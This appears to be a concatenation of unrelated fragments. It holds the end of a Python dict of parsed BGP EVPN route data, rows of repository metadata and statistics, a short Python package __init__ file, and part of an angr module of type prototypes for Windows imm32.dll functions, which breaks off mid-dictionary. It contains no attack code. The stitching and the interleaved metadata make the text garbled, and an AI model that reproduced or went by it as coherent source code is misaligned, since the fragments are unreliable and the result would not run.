'tun_id':{
'local':True
}
},
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[3][3.3.3.3:11][0][32][55.55.55.55]/17':{
'table_version':'34',
'nlri_data':{
'route-type':'3',
'rd':'3.3.3.3:11',
'eti':'0',
'ip_len':'32',
'orig_rtr_id':'55.55.55.55',
'subnet':'17'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'55.55.55.55',
'gateway':'1.1.1.1',
'originator':'1.1.1.1',
'next_hop_via':'default',
'localpref':100,
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':2,
'route_info':'1 2',
'imported_path_from':'[3][5.5.5.5:11][0][32][55.55.55.55]/17 (global)',
'ext_community':'RT:3:11 ENCAP:8',
'pmsi':{
'tun_type':'IR',
'vni':'10000',
'tun_id':{
'tun_endpoint':'55.55.55.55'
}
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
}
},
'route_distinguisher':'3.3.3.3:11'
}
}
}
}
}
}
} | 39.95122 | 120 | 0.305725 | 1,236 | 14,742 | 3.473301 | 0.093042 | 0.034475 | 0.034941 | 0.024225 | 0.921733 | 0.902166 | 0.885628 | 0.88423 | 0.870487 | 0.857675 | 0 | 0.181233 | 0.53663 | 14,742 | 369 | 121 | 39.95122 | 0.447226 | 0 | 0 | 0.734417 | 0 | 0.03794 | 0.344842 | 0.055755 | 0 | 0 | 0.001628 | 0 | 0 | 1 | 0 | false | 0 | 0.01626 | 0 | 0.01626 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ea949cfdab8e88af75446f3f697038500aac5a1c | 126 | py | Python | Pyflai/system/filesystem/__init__.py | CMakerA/Pyflai | 4c3ed66d0d046de56c4bf6a04cb6ce8ebdf34693 | [
"Apache-2.0"
] | 1 | 2018-02-14T08:33:25.000Z | 2018-02-14T08:33:25.000Z | Pyflai/system/filesystem/__init__.py | CMakerA/Pyflai | 4c3ed66d0d046de56c4bf6a04cb6ce8ebdf34693 | [
"Apache-2.0"
] | null | null | null | Pyflai/system/filesystem/__init__.py | CMakerA/Pyflai | 4c3ed66d0d046de56c4bf6a04cb6ce8ebdf34693 | [
"Apache-2.0"
] | null | null | null | __all__ = ["File", "Directory"]
from Pyflai.system.filesystem.File import *
from Pyflai.system.filesystem.Directory import *
| 25.2 | 48 | 0.769841 | 15 | 126 | 6.2 | 0.533333 | 0.215054 | 0.344086 | 0.55914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103175 | 126 | 4 | 49 | 31.5 | 0.823009 | 0 | 0 | 0 | 0 | 0 | 0.103175 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
575c5e9ad6f3f9f914eb12f5eef39d825bb93fbd | 39,627 | py | Python | angr/procedures/definitions/win32_imm32.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_imm32.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_imm32.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("imm32.dll")
prototypes = \
{
#
'ImmInstallIMEA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["lpszIMEFileName", "lpszLayoutText"]),
#
'ImmInstallIMEW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["lpszIMEFileName", "lpszLayoutText"]),
#
'ImmGetDefaultIMEWnd': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0"]),
#
'ImmGetDescriptionA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpszDescription", "uBufLen"]),
#
'ImmGetDescriptionW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpszDescription", "uBufLen"]),
#
'ImmGetIMEFileNameA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpszFileName", "uBufLen"]),
#
'ImmGetIMEFileNameW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpszFileName", "uBufLen"]),
#
'ImmGetProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1"]),
#
'ImmIsIME': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmSimulateHotKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]),
#
'ImmCreateContext': SimTypeFunction([], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)),
#
'ImmDestroyContext': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmGetContext': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0"]),
#
'ImmReleaseContext': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]),
#
'ImmAssociateContext': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1"]),
#
'ImmAssociateContextEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2"]),
#
'ImmGetCompositionStringA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "lpBuf", "dwBufLen"]),
#
'ImmGetCompositionStringW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "lpBuf", "dwBufLen"]),
#
'ImmSetCompositionStringA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="SET_COMPOSITION_STRING_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "dwIndex", "lpComp", "dwCompLen", "lpRead", "dwReadLen"]),
#
'ImmSetCompositionStringW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="SET_COMPOSITION_STRING_TYPE"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "dwIndex", "lpComp", "dwCompLen", "lpRead", "dwReadLen"]),
#
'ImmGetCandidateListCountA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpdwListCount"]),
#
'ImmGetCandidateListCountW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "lpdwListCount"]),
#
'ImmGetCandidateListA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "dwCount": SimTypeInt(signed=False, label="UInt32"), "dwSelection": SimTypeInt(signed=False, label="UInt32"), "dwPageStart": SimTypeInt(signed=False, label="UInt32"), "dwPageSize": SimTypeInt(signed=False, label="UInt32"), "dwOffset": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CANDIDATELIST", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "deIndex", "lpCandList", "dwBufLen"]),
#
'ImmGetCandidateListW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "dwCount": SimTypeInt(signed=False, label="UInt32"), "dwSelection": SimTypeInt(signed=False, label="UInt32"), "dwPageStart": SimTypeInt(signed=False, label="UInt32"), "dwPageSize": SimTypeInt(signed=False, label="UInt32"), "dwOffset": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CANDIDATELIST", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "deIndex", "lpCandList", "dwBufLen"]),
#
'ImmGetGuideLineA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="GET_GUIDE_LINE_TYPE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "dwIndex", "lpBuf", "dwBufLen"]),
#
'ImmGetGuideLineW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="GET_GUIDE_LINE_TYPE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "dwIndex", "lpBuf", "dwBufLen"]),
#
'ImmGetConversionStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpfdwConversion", "lpfdwSentence"]),
#
'ImmSetConversionStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2"]),
#
'ImmGetOpenStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmSetOpenStatus': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]),
#
'ImmGetCompositionFontA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"lfHeight": SimTypeInt(signed=True, label="Int32"), "lfWidth": SimTypeInt(signed=True, label="Int32"), "lfEscapement": SimTypeInt(signed=True, label="Int32"), "lfOrientation": SimTypeInt(signed=True, label="Int32"), "lfWeight": SimTypeInt(signed=True, label="Int32"), "lfItalic": SimTypeChar(label="Byte"), "lfUnderline": SimTypeChar(label="Byte"), "lfStrikeOut": SimTypeChar(label="Byte"), "lfCharSet": SimTypeChar(label="Byte"), "lfOutPrecision": SimTypeChar(label="Byte"), "lfClipPrecision": SimTypeChar(label="Byte"), "lfQuality": SimTypeChar(label="Byte"), "lfPitchAndFamily": SimTypeChar(label="Byte"), "lfFaceName": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 32)}, name="LOGFONTA", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lplf"]),
#
'ImmGetCompositionFontW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"lfHeight": SimTypeInt(signed=True, label="Int32"), "lfWidth": SimTypeInt(signed=True, label="Int32"), "lfEscapement": SimTypeInt(signed=True, label="Int32"), "lfOrientation": SimTypeInt(signed=True, label="Int32"), "lfWeight": SimTypeInt(signed=True, label="Int32"), "lfItalic": SimTypeChar(label="Byte"), "lfUnderline": SimTypeChar(label="Byte"), "lfStrikeOut": SimTypeChar(label="Byte"), "lfCharSet": SimTypeChar(label="Byte"), "lfOutPrecision": SimTypeChar(label="Byte"), "lfClipPrecision": SimTypeChar(label="Byte"), "lfQuality": SimTypeChar(label="Byte"), "lfPitchAndFamily": SimTypeChar(label="Byte"), "lfFaceName": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 32)}, name="LOGFONTW", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lplf"]),
#
'ImmSetCompositionFontA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"lfHeight": SimTypeInt(signed=True, label="Int32"), "lfWidth": SimTypeInt(signed=True, label="Int32"), "lfEscapement": SimTypeInt(signed=True, label="Int32"), "lfOrientation": SimTypeInt(signed=True, label="Int32"), "lfWeight": SimTypeInt(signed=True, label="Int32"), "lfItalic": SimTypeChar(label="Byte"), "lfUnderline": SimTypeChar(label="Byte"), "lfStrikeOut": SimTypeChar(label="Byte"), "lfCharSet": SimTypeChar(label="Byte"), "lfOutPrecision": SimTypeChar(label="Byte"), "lfClipPrecision": SimTypeChar(label="Byte"), "lfQuality": SimTypeChar(label="Byte"), "lfPitchAndFamily": SimTypeChar(label="Byte"), "lfFaceName": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 32)}, name="LOGFONTA", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lplf"]),
#
'ImmSetCompositionFontW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"lfHeight": SimTypeInt(signed=True, label="Int32"), "lfWidth": SimTypeInt(signed=True, label="Int32"), "lfEscapement": SimTypeInt(signed=True, label="Int32"), "lfOrientation": SimTypeInt(signed=True, label="Int32"), "lfWeight": SimTypeInt(signed=True, label="Int32"), "lfItalic": SimTypeChar(label="Byte"), "lfUnderline": SimTypeChar(label="Byte"), "lfStrikeOut": SimTypeChar(label="Byte"), "lfCharSet": SimTypeChar(label="Byte"), "lfOutPrecision": SimTypeChar(label="Byte"), "lfClipPrecision": SimTypeChar(label="Byte"), "lfQuality": SimTypeChar(label="Byte"), "lfPitchAndFamily": SimTypeChar(label="Byte"), "lfFaceName": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 32)}, name="LOGFONTW", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lplf"]),
#
'ImmConfigureIMEA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmConfigureIMEW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmEscapeA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmEscapeW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmGetConversionListA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "dwCount": SimTypeInt(signed=False, label="UInt32"), "dwSelection": SimTypeInt(signed=False, label="UInt32"), "dwPageStart": SimTypeInt(signed=False, label="UInt32"), "dwPageSize": SimTypeInt(signed=False, label="UInt32"), "dwOffset": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CANDIDATELIST", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="GET_CONVERSION_LIST_FLAG")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "lpSrc", "lpDst", "dwBufLen", "uFlag"]),
#
'ImmGetConversionListW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "dwCount": SimTypeInt(signed=False, label="UInt32"), "dwSelection": SimTypeInt(signed=False, label="UInt32"), "dwPageStart": SimTypeInt(signed=False, label="UInt32"), "dwPageSize": SimTypeInt(signed=False, label="UInt32"), "dwOffset": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CANDIDATELIST", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="GET_CONVERSION_LIST_FLAG")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "lpSrc", "lpDst", "dwBufLen", "uFlag"]),
#
'ImmNotifyIME': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="NOTIFY_IME_ACTION"), SimTypeInt(signed=False, label="NOTIFY_IME_INDEX"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "dwAction", "dwIndex", "dwValue"]),
#
'ImmGetStatusWindowPos': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpptPos"]),
#
'ImmSetStatusWindowPos': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpptPos"]),
#
'ImmGetCompositionWindow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="COMPOSITIONFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpCompForm"]),
#
'ImmSetCompositionWindow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="COMPOSITIONFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpCompForm"]),
#
'ImmGetCandidateWindow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwIndex": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="CANDIDATEFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "lpCandidate"]),
#
'ImmSetCandidateWindow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwIndex": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="CANDIDATEFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpCandidate"]),
#
'ImmIsUIMessageA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmIsUIMessageW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmGetVirtualKey': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0"]),
#
'ImmRegisterWordA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpszReading", "param2", "lpszRegister"]),
#
'ImmRegisterWordW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpszReading", "param2", "lpszRegister"]),
#
'ImmUnregisterWordA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpszReading", "param2", "lpszUnregister"]),
#
'ImmUnregisterWordW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpszReading", "param2", "lpszUnregister"]),
#
